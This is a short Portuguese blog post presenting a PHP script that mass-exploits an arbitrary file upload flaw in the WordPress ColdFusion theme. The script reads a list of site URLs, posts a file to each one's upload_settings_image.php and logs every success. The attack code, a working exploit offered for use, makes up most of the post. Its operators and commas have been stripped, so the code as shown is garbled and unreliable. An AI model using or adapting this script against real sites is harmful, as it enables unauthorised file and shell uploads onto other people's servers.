sábado, 16 de novembro de 2013

WP Cold Fusion - Arbitrary File Upload

Para  começar um pequeno script para explorar a vulnerabilidade conhecida como 'Remote Code Execution' no tema Cold Fusion do WordPress, em alguns hosts. O exploit está por todo lugar. :)

http://1337day.com/exploit/21431

Temos também um exploit um pouco modificado pelo n4sss


<?php
/**
 *
 * ColdFusionVuln.txt => Exploiteds.
 * Automatization by n4sss
 *
 * http://1337day.com/exploit/21431
 *
 */

set_time_limit(0);

function exploit($wp_file$shell){
        foreach($wp_file as $url_id => $url){
            $uploadfile $shell;
            if(!empty($url)){
            print "[{$url_id}] Query in => {$url}\n";
            $ch curl_init();
            curl_setopt($chCURLOPT_URL"{$url}/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
            curl_setopt($chCURLOPT_POSTtrue);
            curl_setopt($chCURLOPT_POSTFIELDS,
                array('Filedata'=>"@$uploadfile"));
            curl_setopt($chCURLOPT_RETURNTRANSFER1);
            $postResult curl_exec($ch);
                if(preg_match('/OK/'$postResult)){
                    print "\n\n[++++] Exploited => {$url}/wp-content/uploads/settingsimages/{$shell}\n\n";
                    $fp fopen("ColdFusionVuln.txt""a");
                          fwrite($fp"[++++] Exploited => {$url}/wp-content/uploads/settingsimages/{$shell}\r\n");
                          fclose($fp);
                          flush();
            }
        }
    }

}

if(!@$argv[1]){
    print "php $argv[0] wp_file.txt\n\n";
    print "Example:\nphp $argv[0] wp_file.txt\n";
    exit(0);
}else{
    @unlink("spoiler.txt");
    $shell "spoiler.txt";
    $wp_file explode("\n"file_get_contents("$argv[1]"));
    $fp fopen($shell"a");
    fwrite($fp"Exploited\r\n");
    fclose($fp);
    exploit($wp_file$shell);
}
?>

Nenhum comentário:

Postar um comentário